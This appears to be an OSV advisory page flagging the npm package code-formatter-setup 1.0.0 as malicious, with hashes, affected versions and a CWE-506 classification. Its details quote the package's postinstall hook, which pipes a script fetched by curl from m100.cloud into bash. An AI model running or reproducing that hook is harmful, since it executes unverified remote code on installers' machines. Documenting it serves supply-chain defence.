MAL-2026-10682

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/code-formatter-setup/MAL-2026-10682.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-10682
Published
2026-07-15T15:45:12Z
Modified
2026-07-15T16:49:28.591536438Z
Summary
Malicious code in code-formatter-setup (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (29eac23cdb5855a900e15c2d86231de29d9985573f90f819f9d4ba08425b9042)

package.json declares a postinstall lifecycle hook that runs node -e "require('child_process').execSync('curl -s https://m100.cloud/setup | bash')", fetching an unpinned, unverified shell script from https://m100.cloud/setup and executing it via bash on the installer's host at npm install time. The destination is not a publisher-matched or registry-hosted artifact, and there is no native build source or integrity check accompanying the fetch. Whatever bytes m100.cloud returns at install time run with the privileges of the user performing the install.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-010683",
            "sha256": "29eac23cdb5855a900e15c2d86231de29d9985573f90f819f9d4ba08425b9042",
            "import_time": "2026-07-15T16:34:36.255019957Z",
            "modified_time": "2026-07-15T15:45:12Z",
            "source": "amazon-inspector",
            "versions": [
                "1.0.0"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / code-formatter-setup

Package

Name
code-formatter-setup
View open source insights on deps.dev
Purl
pkg:npm/code-formatter-setup

Affected ranges

Affected versions

1.*
1.0.0

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
indicators
{
    "package_integrity": [
        {
            "filename": "code-formatter-setup-1.0.0.tgz",
            "hashes": {
                "sha1": "6cdc6a96c2a8a52410f43df980332cc1c44ea12a",
                "sha512_sri": "sha512-peWvRYrU7CdChErotDJbc8voB3RE93KzMq8xvx1l0b6EOE5AW0OujRT04IjRDjOz1BxlUixupMU9zww1/NlZ2w=="
            }
        }
    ],
    "evidence_files": [
        {
            "tlsh": "5df09931cc195a7326c6029d98935041be2b260b0a04ac09e793017c878ea364abe35f",
            "sha256": "e6cd79edd8ecf365777f5da7ff97fcc877f6d345a09b17befc8ea099edd4e49f",
            "path": "package.json"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/code-formatter-setup/MAL-2026-10682.json"